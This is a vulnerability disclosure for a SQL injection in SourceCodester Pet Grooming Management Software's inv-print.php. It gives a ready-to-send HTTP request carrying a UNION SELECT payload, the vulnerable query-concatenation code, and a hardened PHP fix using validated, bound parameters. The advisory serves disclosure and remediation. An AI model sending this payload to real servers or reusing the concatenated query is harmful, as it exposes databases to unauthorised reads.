### Key Information

- **Vulnerability Title**: SourceCodester Pet Grooming Management Software inv-print.php SQL Injection Vulnerability
- **Affected Version**: SourceCodester Pet Grooming Management Software v1.0
- **Test Environment**: PHP 8.4.5, OpenResty 1.21.4.3-3-focal
- **CVE Status**: Reported, awaiting CVE ID

#### Description

The `id` parameter in `/admin/inv-print.php` is vulnerable to SQL injection.

#### Payload

```http
POST /admin/inv-print.php HTTP/2.1
Host: 192.168.56.134:8081
Referer: http://192.168.56.134:8081/assets/auth.php
Cache-Control: no-cache
Cookie: PHPSESSID=...
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome ...
Accept-Encoding: gzip, deflate
Upgrade-Insecure-Requests: 1
Pragma: no-cache
Accept: */*
Content-Type: application/x-www-form-urlencoded
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8,zh-TW;q=0.7,en-US;q=0.6
Content-Length: 309

id=-5491 UNION ALL SELECT 1,NULL,CONCAT(0x27,user(),0x27),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL
```

#### Proof of Concept

- Constructed a POST request and sent it to `/admin/inv-print.php`, successfully retrieving injected data in the response.
- Code review revealed that the `id` parameter is directly concatenated into the SQL query, leading to the SQL injection vulnerability.

#### Relevant Code Snippet

```php
// The request value is spliced into the SQL text before prepare() is called,
// so the prepared statement carries no bound parameters and offers no protection.
$sql = "SELECT * FROM tbl_invoice where id='" . $_POST['id'] . "'";
$statement = $conn->prepare($sql);
$statement->execute();
```
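As an added example (not code from the advisory or from the Pet Grooming application), the same lookup rewritten so the identifier is validated and bound as a typed parameter. It assumes `$conn` is a PDO handle and that `tbl_invoice.id` is an integer column; the in-memory SQLite table is constructed here only so the snippet runs stand-alone.

```php
<?php
// Added example, not the application's own code. Assumptions: $conn is a PDO
// handle and tbl_invoice.id is an integer column.

// Hardened replacement for the inv-print.php query: reject anything that is not
// a positive integer, then bind the value so it never becomes part of the SQL text.
function fetchInvoice(PDO $conn, array $post): ?array
{
    $id = filter_var($post['id'] ?? null, FILTER_VALIDATE_INT,
        ['options' => ['min_range' => 1]]);
    if ($id === false) {
        // A value such as "-5491 UNION ALL SELECT ..." fails validation here and
        // never reaches the database.
        return null;
    }
    $statement = $conn->prepare('SELECT * FROM tbl_invoice WHERE id = :id');
    $statement->bindValue(':id', $id, PDO::PARAM_INT);
    $statement->execute();
    $row = $statement->fetch(PDO::FETCH_ASSOC);
    return $row === false ? null : $row;
}

// Constructed fixture standing in for the real database.
$conn = new PDO('sqlite::memory:');
$conn->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
// On MySQL, also disable client-side emulation so the server performs the binding:
// $conn->setAttribute(PDO::ATTR_EMULATE_PREPARES, false);
$conn->exec('CREATE TABLE tbl_invoice (id INTEGER PRIMARY KEY, customer TEXT)');
$conn->exec("INSERT INTO tbl_invoice VALUES (7, 'constructed sample customer')");

// Legitimate request: returns the one matching row.
var_dump(fetchInvoice($conn, ['id' => '7']));

// Input of the shape used in the advisory: rejected by validation (returns NULL).
// Even if it reached the query, it would be bound as a literal, not executed as SQL.
var_dump(fetchInvoice($conn, ['id' => '-5491 UNION ALL SELECT 1,NULL']));
```

Returning `null` for an invalid identifier lets the caller answer with an HTTP 400 instead of running a query, which also gives a clean signal to log for detection.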